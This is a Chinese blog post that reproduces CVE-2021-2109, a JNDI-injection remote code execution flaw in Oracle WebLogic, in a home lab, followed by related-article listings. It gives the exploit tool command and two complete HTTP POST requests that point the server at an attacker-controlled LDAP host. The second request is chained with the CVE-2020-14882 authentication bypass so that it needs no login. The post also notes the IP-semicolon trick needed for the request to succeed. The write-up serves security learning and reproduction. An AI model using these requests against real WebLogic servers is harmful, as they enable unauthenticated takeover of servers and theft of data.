Weblogic远程代码执行分析复现(CVE-2021-2109)

最新推荐文章于 2024-08-12 10:54:33 发布
最新推荐文章于 2024-08-12 10:54:33 发布
阅读量884 收藏 2
点赞数
分类专栏: 中间件漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/116299350
版权

声明

好好学习,天天向上

漏洞描述

编号:CVE-2021-2109
Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。

影响范围

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

复现过程

这里使用jdk-8u181,weblogic12.1.4.0版本

oracle官网下载weblogic的12.1.4.0版本

自己搭建确实是一言难尽,运行jar包各种报错,我专门为了这个漏洞装了个4C4G40G的win10的虚机

win10镜像地址

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

搭建过程参考

https://www.cnblogs.com/Zh1z3ven/p/13663714.html
https://www.kancloud.cn/oscar999/weblogic_admin/1509929

没想到新装的虚机也是各种报错,最后参考上面两个链接,使用绝对路径执行java命令才能正常安装

"C:\Program Files\Java\jdk1.8.0_181\bin\java.exe" -jar ./fmw_12.2.1.4.0_wls_lite_generic.jar

在这里插入图片描述

环境启动后,访问,输入刚刚设置的密码(这里注意一点,首次安装完,可能半天登录不进去,重启一下就可以正常登录了,真。。费劲)

http://192.168.31.61:7001/console

在这里插入图片描述

利用 JNDI 注入工具生成payload,攻击地址

https://github.com/welk1n/JNDI-Injection-Exploit

kali执行,IP是kali的IP

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc -A 192.168.31.64

拷贝

ldap://192.168.31.64:1389/newxvi

在这里插入图片描述

登录 weblogic 控制台,发送数据包,这里有坑,注意吖,要改Host和Referer字段里面的IP,要把Cookie替换成你们登录后台的真实Cookie,复制ldap的路径URL时,要把IP里面的第三个.换成分号,这个分号不换的话,就一直返回302,不会返回200

POST /console/consolejndi.portal HTTP/1.1
Host: 192.168.31.61:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://192.168.31.61:7001/console/css/%252e%252e%252f/consolejndi.portal
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: ADMINCONSOLESESSION=l3hw4cD8nJbaVySYAmggZ5yzDCn-4E-MT-pPTq5Mt5ecF7jzMEGi!-339443100
Connection: close
Content-Length: 163

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.31;64:1389/newxvi;AdminServer%22)

在这里插入图片描述

成功弹出计算器

在这里插入图片描述

可以结合CVE-2020-14882权限绕过漏洞,删除cookie,重新构造数据包

POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1
Host: 192.168.31.61:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://192.168.31.61:7001/console/css/%252e%252e%252f/consolejndi.portal
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 163

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.31;64:1389/newxvi;AdminServer%22)

在这里插入图片描述

在这里插入图片描述

维梓-
关注
专栏目录
复现CVE-2021-2109 (Weblogic Server远程代码执行漏洞)
记录并分享学习安全的知识点..
01-19 4001
一、漏洞介绍 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 3.6.0.0 WebLogic 1.3.0.0 WebLogic 2.1.3.0 WebLogic 2.1.4.0 漏洞判别方式:http://x.x.x.x:7001/conso
WebLogic LDAP远程代码执行漏洞(CVE-2021-2109
千寻的博客
02-11 4367
漏洞名称 WebLogic LDAP远程代码执行漏洞 漏洞编号 CVE-2021-2109 JNDI简介 JNDI是Java Naming and Directory Interface (Java命名和目录接口)的英文简写, 是为Java应用程序提供命名和目录访问服务的API (application programing interface,应用程序编程接口)。 漏洞描述 2020年11月19日,阿里云安全向Oracle官方报告了Weblogic Server远程代码执行漏洞。
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
weblogic wls-wsat组件远程命令执行CVE-2017-3506)
YouthBelief的博客
11-01 8120
weblogic wls-wsat组件远程命令执行CVE-2017-3506) 前言 与weblogic 反序列化(CVE-2017-10271)类似 一般情况下weblogic会开放7001以及7002端口 0x01 漏洞描述 wls-wsat组件远程命令执行 如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞 /wls-wsat/CoordinatorPortType11 0x02 影响范围 OracleWebLogic Server10.3.6.
速报:Weblogic反序列化0day/1day漏洞的临时修补方案
ABC_123的博客
07-19 481
Part1 前言大家好,我是ABC_123。一年一度的大考就要开始了,坊间传闻weblogic中间件爆出了0day或者1day漏洞,这里ABC_123给大家提供一个临时的漏洞修补方案。Part2 研究过程最近几年的weblogic反序列化漏洞都与T3和IIOP协议相关,所以还是建议禁用T3和IIOP协议,但是网上很多禁用方法不对,ABC_123给大家介绍一下正确操作方法。禁用T3协议过程进...
Weblogic 远程代码执行CVE-2018-2893)
最新发布
qq_23003811的博客
08-12 268
WebLogic Server使用T3协议在WebLogic Server和客户端间传输数据和通信,由于WebLogic的T3协议和Web协议使用相同的端口,导致在默认情况下,WebLogic Server T3协议通信和Web端具有相同的访问权限。易受攻击的WebLogic服务允许未经身份验证的攻击者通过T3网络访问及破坏Oracle WebLogic Server。1、修改“cmd: ls /tmp”达到任意命令执行
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_50854662的博客
02-28 1288
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 609
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
PeiQi的博客
01-22 3500
Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109 漏洞描述 2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server。 成功攻击此漏洞可能导致Oracle WebLogic Server的接管。 CVSS 3.1基本分数7.2(对机密性,完整性和可用性的影响)。 CVSS向量:(CVSS:3.1 / AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H) 使适应 需要登录验证 如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
Oracle WebLogic Server开发权威指南_pdf_源码
11-15
Oracle WebLogic Server开发权威指南 包含完整PDF、书中示例代码完整源码、引用Oracle文档地址列表等。
Weblogic远程代码执行漏洞(CVE-2023-21839)复现/保姆级讲解
BGiscool的博客
02-28 4605
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码
WebLogic反序列化远程命令执行(CNVD-C-2019-48814)
weixin_51151498的博客
12-07 855
WebLogic反序列化远程命令执行(CNVD-C-2019-48814)
CVE-2021-2109Weblogic Server远程代码执行漏洞验证及修复
weixin_38896449的博客
03-25 1881
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 2021年1月20日,Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。 2.影响版本 Weblogic Server 10
Weblogic权限绕过之CVE-2020-14882利用和源码分析
weixin_45682070的博客
03-25 6649
前言: 环境: 利用: 代码分析: 鉴权代码分析CVE-2020-14882是权限绕过漏洞,所以我们直接切入主题,找到鉴权的代码,在idea中双击shift,查找doSecuredExecute方法。 此方法存在于\middleware\wlserver\modules\com.oracle.weblogic.servlet.jar!\weblogic\servlet\internal\WebAppServletContext.classWebAppServletContext类,可以看到中间有个se
CVE-2021-2109 Weblogic Server远程代码执行漏洞
m0_56642842的博客
06-24 3165
0x00 简介 WebLogic是美国甲骨文公司出品的一个application server(应用服务器),确切的说是一个基于JAVAEE架构的中间件WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 0x01 漏洞概述 CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞,经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码,可以配合CVE-2020-14882未授权漏洞执行任意
Weblogic RCE漏洞CVE-2020-14882&14883:复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882 和 CVE-2020-14883 被发现,这些漏洞的存在使得未经授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值